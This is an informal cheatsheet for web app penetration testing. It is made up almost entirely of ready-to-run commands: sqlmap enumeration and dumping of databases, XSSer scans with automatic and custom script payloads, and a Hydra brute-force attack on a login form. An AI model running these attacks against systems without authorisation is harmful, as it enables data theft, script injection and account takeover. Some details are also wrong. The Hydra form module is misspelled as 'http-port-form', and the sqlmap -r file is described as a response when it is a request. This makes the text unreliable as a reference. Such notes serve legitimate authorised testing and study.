Web app pentest

cheatsheet for those tools m not familiar with (sorry m not covering all tools, most of em are easy)

sqlmap

Get request

• to view databases

  • dont write --dbs at start for testing

sqlmap -u "$url/param?=something" --cookie "COOKIE" -p something --dbs

• to view tables

sqlmap -u "$url/param?=something" --cookie "COOKIE" -p something \
-D DATABASE_NAME --tables

• to view colums of that tables

sqlmap -u "$url/param?=something" --cookie "COOKIE" -p something \
-D DB_NAME -T TABLE_NAME --columns

• to dump colums

sqlmap -u "$url/param?=something" --cookie "COOKIE" -p something \
-D DB_NAME -T TABLE_NAME -C col1,col2 --dump

Post request

• save the response file from burp suite

sqlmap -r $filename -p something 

# -r is the filename where response is stored
# -p is the target variable where u wanna check sql injection 

XSSer

Get request

xsser --url "$url/something=XSS&other_value=eg" --cookie "COOKIE"
#use cookie if needed
#XSS in the url will be the target variable

Post request

• to scan

xsser -u "$url/something" -p "post_req=XSS&other_data=idk" 
#XSS represents target variable in -p

• to scan for all possible vuln/injection payload

xsser -u "$url/something" -p "post_req=XSS&other_data=idk" --auto

• to try custom payload

xsser -u "$url/something" -p "post_req=XSS&other_data=idk" \
-Fp "<script>your_payload</script>"

Hydra

hydra -L users.txt -P passwd.txt $IP http-port-form \ 
"/page.php:user_name=^USER^&pass_name=^PASS^&other_params:Invalid creds error msg"

#the user_name and pass_name are the names used in the form (name=)
#you can just paste that line with the one u get in burp request and then change
#^USER^ and ^PASS^